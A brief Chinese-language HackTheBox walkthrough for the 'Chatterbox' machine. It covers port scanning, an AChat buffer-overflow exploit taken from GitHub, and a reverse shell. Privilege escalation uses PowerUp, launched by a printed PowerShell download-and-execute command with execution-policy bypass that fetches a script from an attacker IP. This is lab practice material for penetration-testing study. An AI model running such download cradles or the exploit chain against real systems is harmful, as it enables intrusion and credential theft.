Chatterbox - HackTheBox
nmap扫描
9255和9256端口显示为同一个服务,访问看看
9255访问为空
9256也不知道是个啥,搜一下有无exp
一个缓冲区溢出漏洞
还给了生成方法,修改一下
修改为用powershell远程请求本地的反弹shell文件
exploit-db给的python脚本那就是死活没用啊,换了一个github的脚本
https://github.com/mpgn/AChat-Reverse-TCP-Exploit
把ip也修改一下
提权
提权脚本检测了一下,基本是没有可利用的
利用powerup检测一下,发现当前用户的密码
powershell.exe -nop -exec bypass -c "iex(new-object system.net.webclient).downloadstring('http://10.10.14.17/PowerUp.ps1')"
尝试用这个密码切换一下用户
https://stackoverflow.com/questions/15895877/how-to-switch-current-user-using-powershell
修改一下
依次执行